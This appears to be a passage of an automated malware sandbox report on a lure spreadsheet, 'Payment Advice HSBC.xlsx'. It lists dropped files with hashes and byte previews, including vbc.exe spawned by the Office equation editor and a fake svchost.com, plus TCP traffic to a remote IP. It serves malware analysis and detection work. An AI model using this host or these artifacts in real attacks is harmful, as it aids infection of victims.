SSDEEP:	384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
MD5:	63ED10C9DF764CF12C64E6A9A2353D7D
SHA1:	608BE0D9462016EA4F05509704CE85F3DDC50E63
SHA-256:	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
SHA-512:	9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5\|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....\|AQ.h4....x..\6....\|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...\|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..\|0...x...\|..../F....o.._\|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1E7B828.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0850B4B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D495435E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14828
Entropy (8bit):	7.9434227607871355
Encrypted:	false
SSDEEP:	384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
MD5:	58DD6AF7C438B638A88D107CC87009C7
SHA1:	F25E7F2F240DC924A7B48538164A5B3A54E91AC6
SHA-256:	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
SHA-512:	C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...\|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..TQ.%..X.......{....,.q.\,.E".........z...abbB...j.\.J.(.b.......\|>...........R....L&..X.eYV"..-.R)B.TM&..pX.j.Z..9..F.Z.6....b.\./%..~...).B<..T.z..D"..(...\...d2YKKK...mm.T..l.T..I$.x<..J..q...J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.\|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..\|>/.Hd2....EQ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D899DFC7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19408
Entropy (8bit):	7.931403681362504
Encrypted:	false
SSDEEP:	384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
MD5:	63ED10C9DF764CF12C64E6A9A2353D7D
SHA1:	608BE0D9462016EA4F05509704CE85F3DDC50E63
SHA-256:	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
SHA-512:	9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5\|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....\|AQ.h4....x..\6....\|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...\|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..\|0...x...\|..../F....o.._\|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E39474D0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 600 x 306, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	42465
Entropy (8bit):	7.979580180885764
Encrypted:	false
SSDEEP:	768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
MD5:	C31D090D0B6B5BCA539D0E9DB0C57026
SHA1:	D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
SHA-256:	687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
SHA-512:	B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
Malicious:	false
Preview:	.PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u..'.................//F.......h.++..j...e....A.H?>.......\|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..]\-..yG2Ne.B....\@q....8.....W./i.C..P....O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b

C:\Users\user\AppData\Local\Temp\3582-490\vbc.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	708608
Entropy (8bit):	7.856491713519458
Encrypted:	false
SSDEEP:	12288:LBFmRqmabUtWTlW/kcbP3/1S/XTBWym1jr0ahKpymrF9oZXKanCB7U3WJ3m5Jie:/Wqm5tWxWBz/1YjBZm1jrdhm999ULie
MD5:	83B99FBC523761C0975301CD70BC6023
SHA1:	EF6D01DE8C51B44EBBF3D27BBD1272A94C15E853
SHA-256:	00E26C4CFC104D89F08AC19E1070DAD6DCAA043F86C5ED8916B0E2F04EC60D2C
SHA-512:	81E92245D5CA9812269C62FF8E727E6DDFBE4BDD14AD554B53F32900B881B1A67608866C10C4DA85F9A52AEC0ADC5EC1A8FF4E351E580E0BA8C5628D3EACAC45
Malicious:	false
Preview:	..?...8.......pF.0...}........k"U...r.-...lC.F^H:s!_.....H...>..B....6.{O..7...0.8b...!..,sI.........F?.[m=Q...H. .`j....C.g\.Ex............$.(.^.PX...A4AFF...W..V....S0..T...xF...y..y...&l.!..S...u.p.Y....CC........+.8..T..UM...:.,Iis.[......$.pss...5...o;....y....o...q<.;.g...A..m......A..1..C.....:;.....OI..C<....Z\.X.z....Q.5..f0.mU.P...64..1.=MK...}S.a.\.j...S..Q..b.$.t/d......^z..#4....B..1.....^.....5.;L`..^T.!(h...M..{oY.nP.Y..i......l.........dq..z.s.%....^..Zz.D.n..E....,....S.....C.H.BG...y.......~b.4.n0...[Tw.N_X..T..FeJ..<f\|9.4.=..h..)^`Ou.8O,?.;r_.J.......FKU......e{\.tDp..ay5z//...E.6.+..(yP[6...K.t....b..o u.k.<Y..Y..C4.:1;.:z~....J.!V....>O.F;...y?...1....O.I.....4"...1.;..;......D.....!....Z..x....(pv.?.[E..siut:A\........S.....t\......{x.Vf.M.a.V..... &#..S.l......UNT.u..4.n......A....K'..7.(.<8....@...'R#g.d...>~c#.sI...z.5;.sR=*...hM".g......Qg...b..[K..=...:{.1d.........>6..x7^...........".g.:.A,.W_<..mT..h..@;.y

C:\Users\user\AppData\Local\Temp\tmp5023.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	modified
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:j4n:s
MD5:	23F9A371FE66F5F18A47E7F784BB610A
SHA1:	616E50A43A37D50A598B0D55F7DD753086C64711
SHA-256:	1BA5A0D9CB6474D859B5F7FEA55A343F83EC07BED1EA64EE06F06F5C88AAC8C0
SHA-512:	50D3C4274C1C9B2A0345729FDB83F25572AA816729DD7B38E5252D00DD90D09163B59A91D598E56A00BF4615A812089ADA926843245B5AC1A1AFEBB20E862DEB
Malicious:	false
Preview:	.W\|...&A

C:\Users\user\AppData\Local\Temp\~DF0AF8262799FB45D5.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF1463B7F7DE47BE78.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCB27B9A2E4030915.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEF15841EE438DC53.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	234488
Entropy (8bit):	7.970917962873484
Encrypted:	false
SSDEEP:	6144:c3DW3skwfMnSENl32TOS775xX8E0tZd7xG76s9P:2Wrwf4SENl32CSvfX8z7wD9
MD5:	E8E4CCC6201DD1B16A2133BA56441A5B
SHA1:	F73A1FD7B0AEA60425FEF3E155CCE42E2EDFAC21
SHA-256:	F1DA130D39C64D903450D67844BA701667CCE9B057EEAC8283393C5D2673B5E5
SHA-512:	97D37F01FDCE90B0DD6B6784B8111F5D22E0700340E245DAA765113339BA93D974C3FC7935A93E3B45EF911A2C20BE7C3A3026BE32FAE0C8DBC99996B96F2215
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$Payment Advice HSBC.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	750080
Entropy (8bit):	7.776973471580677
Encrypted:	false
SSDEEP:	12288:xBzcmhiTIabUtWTlW/kcbP3/1S/XTBWym1jr0ahKpymrF9oZXKanCB7U3WJ3m5Ja:xBomhiE5tWxWBz/1YjBZm1jrdhm999Um
MD5:	748F5D75A9F4C4026CC14E46BAFF0BB3
SHA1:	69A81FD68106C9DE3FA4657CEC2468C29A45A171
SHA-256:	A9BA8137D635EF997C4D1388B7758157FA8EE4BFFFCACC49BDF7C5DFE9003421
SHA-512:	191F84E6C6955A2A561F9414EC09ADC660059CC07AB1044FF309C85E1F5B4681F1C8DED5DFA209C1F7BDB19B6718052207D6E1ADC31AF53E97BD52879174C2A0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Windows\svchost.com Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	4.911714274103268
Encrypted:	false
SSDEEP:	768:QVuBR03z6cOhpuD8h7uIztzVCyid56fCxU6Qem0EQrGdWFAuj0nQm6GaVOM6sXZt:xBR2ucOhDh7uIhzVCbd56fCxU6QeSnQJ
MD5:	AE9194BE145CF96D1DC135D9A1DD3CF9
SHA1:	6F1B8FA1B9ACE6A1C55BE410584B6BD514C98DC3
SHA-256:	CB920579A493A3F488A66209BDC454D3A92ED9461A7E823A56BE11A993BE333D
SHA-512:	A15671CCFFA8A6564929DD282C5170EDBAFBB0B2C54B0CB3955387A3615B02B577E80909ECA8D06BAC2BE6A918EC3153E8DBC8CF542098FDC4050362E7B1D2D6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.970917962873484
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Payment Advice HSBC.xlsx
File size:	234488
MD5:	e8e4ccc6201dd1b16a2133ba56441a5b
SHA1:	f73a1fd7b0aea60425fef3e155cce42e2edfac21
SHA256:	f1da130d39c64d903450d67844ba701667cce9b057eeac8283393c5d2673b5e5
SHA512:	97d37f01fdce90b0dd6b6784b8111f5d22e0700340e245daa765113339ba93d974c3fc7935a93e3b45ef911a2c20be7c3a3026be32fae0c8dbc99996b96f2215
SSDEEP:	6144:c3DW3skwfMnSENl32TOS775xX8E0tZd7xG76s9P:2Wrwf4SENl32CSvfX8z7wD9
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 19:05:27.633774042 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.750104904 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.750228882 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.750633955 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.867245913 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.867276907 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.867295027 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.867311954 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.867332935 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.867355108 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.867619038 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.981761932 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981800079 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981817961 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981843948 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981867075 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981889009 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981911898 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981934071 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:27.981972933 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.981997967 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:27.982002020 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.096615076 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096636057 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096648932 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096661091 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096673012 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096688986 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096702099 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096719027 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096735001 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096750975 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096765995 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096781969 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096796989 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096812963 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.096868038 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.096892118 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.097059011 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.097086906 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.097110987 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.097138882 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.100722075 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211337090 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211359978 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211376905 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211393118 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211409092 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211426020 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211442947 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211457968 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211473942 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211491108 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211508036 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211524963 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211524963 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211540937 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211556911 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211565971 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211575031 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211590052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211592913 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211606979 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211625099 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211627960 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211641073 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211653948 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211657047 CET	80	49165	198.12.91.205	192.168.2.22
